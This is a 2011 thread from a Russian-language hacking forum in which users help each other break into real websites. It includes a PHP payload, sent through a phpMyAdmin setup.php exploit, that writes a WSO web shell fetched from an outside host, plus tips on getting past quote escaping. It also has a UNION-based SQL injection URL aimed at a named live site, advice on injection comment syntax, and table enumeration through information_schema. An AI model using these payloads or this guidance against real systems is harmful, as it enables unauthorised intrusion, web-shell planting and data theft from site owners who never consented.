ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.09.2011, 02:05
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Sloneny
Sloneny said:
С помощью эксплойта через phpMyAdmin/scripts/setup.php
выводит
phpinfo();
allow_url_fopen on
magic_quotes_gpc on
при попытке залить полноценный шелл с помощью такой конструкции
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wso.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'http://www.*********.com/wso/******.txt'[/COLOR][COLOR="#007700"]));[/COLOR][/COLOR]
одинарная кавычка экранируется обратным слешем \'
тестил на другом сайте с такими же вышеуказанными параметрами шелл все равно заливается 8-0
пытался кавычку, часть запроса или весь запрос хексить и чарить, не помогло
Подскажите пожалуйста где я ошибся, и каким еще образом можно попытаться обойти экранирование
и залить полноценный шелл. просто stripslashes делай
|
|
|
18.09.2011, 02:13
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]]));&[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]wso[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//evilsite.ru/shell.txt[/COLOR][/COLOR]
|
|
|
|
18.09.2011, 02:36
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 0
Провел на форуме:
11373
Репутация:
0
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]]));&[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]wso[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//evilsite.ru/shell.txt[/COLOR][/COLOR]
как ни старался не сработало
Совсем забыл написать, в эксплойте используется такая конструкция
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
при попытке заменить ее на что либо другое, или матерится или выдает пустую страницу
Никак не могу найти примера работы с stripslashes()
везде написано что он удаляет экранирование символов
но как его применить?
К сожалению с php не очень дружу |
|
|
|
18.09.2011, 05:38
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
2Sloneny скинул решение в ПМ, посмотри если выйдет то опишу тут полноценно.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
18.09.2011, 06:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
10040
Репутация:
7
|
|
Сообщение от rad_scorp
rad_scorp said:
друзья, только начинаю знакомство с sql injection, нашел один сайт без проверки на простейшую инъекцию. Если %27, то:
Код:
Code:
DB Error: syntax error
SELECT login, password FROM emps WHERE login = '' or 1=1 --'
[nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 2]
После коментария пробел поставь
|
|
|
|
19.09.2011, 00:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
14366
Репутация:
0
|
|
есть скуля
Код:
Code:
http://www.feb.spb.ru/news.php?id=100+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+limit+1,1111--
хочу сдампить колонки БД с помощью программы rsaUnDumper[sql] 2.0.exe
делаю все как положено
Сообщение от None
GET http://www.feb.spb.ru/news.php?id=100+union+select+1,,3,4,5,6,7+from+inf ormation_schema.columns+limit+,1111-- HTTP/1.0 User-Agent: Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53 Host: www.*****.ru Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: identity, *;q=0
но ничего не дампиться даже ошибки не выводятся
просто выводится
Сообщение от None
Запросов 10 сохранено 0 ошибок 0
Пробовал запрос без --, пробовал удалять все что ниже --
безрезультатно
А в ручную все идет нормально.
Подскажите что я не так делаю?
Ссылка на дампер http://www.sendspace.com/file/ee74kx |
|
|
|
19.09.2011, 01:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
Сообщение от Samael91
Samael91 said:
есть скуля
Код:
Code:
http://www.feb.spb.ru/news.php?id=100+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+limit+1,1111--
хочу сдампить колонки БД с помощью программы rsaUnDumper[sql] 2.0.exe
делаю все как положено
но ничего не дампиться даже ошибки не выводятся
просто выводится
Пробовал запрос без --, пробовал удалять все что ниже --
безрезультатно
А в ручную все идет нормально.
Подскажите что я не так делаю?
Ссылка на дампер http://www.sendspace.com/file/ee74kx забей сылку в sqlmap,Havij или руками делай запрос!(честно не вижу смысла в этих дамперах)
|
|
|
|
19.09.2011, 02:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
4017
Репутация:
1
|
|
Сообщение от sourcec0de
sourcec0de said:
После коментария пробел поставь
Спасибо, чувак, ты прав, учту. Но базы там покорраптило в хлам. Будем ждать, пока починят.
|
|
|
|
19.09.2011, 02:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
4744
Репутация:
4
|
|
вот начал учить скуль иньекции
подскажите плиз как узнавать имена таблиц?
спасибо.
|
|
|
|
19.09.2011, 02:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
13201
Репутация:
17
|
|
Сообщение от Киев
Киев said:
вот начал учить скуль иньекции
подскажите плиз как узнавать имена таблиц?
спасибо.
ыы самый тяжелый способ это подбирать ручками, например users, admins, members и т.д. Еще есть проги для подбора таблиц по словарям. можно поискать на форуме
а вообще тут смотря к чему таблицы. Если к извесным форумам то таблицы извесны (если их не поменяли). Например таблица юзеров phpbb форума называется phpbb_users. Если это 5 версия Мускула или MSSQL то таблицы можно увидеть через information_schema.tables.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
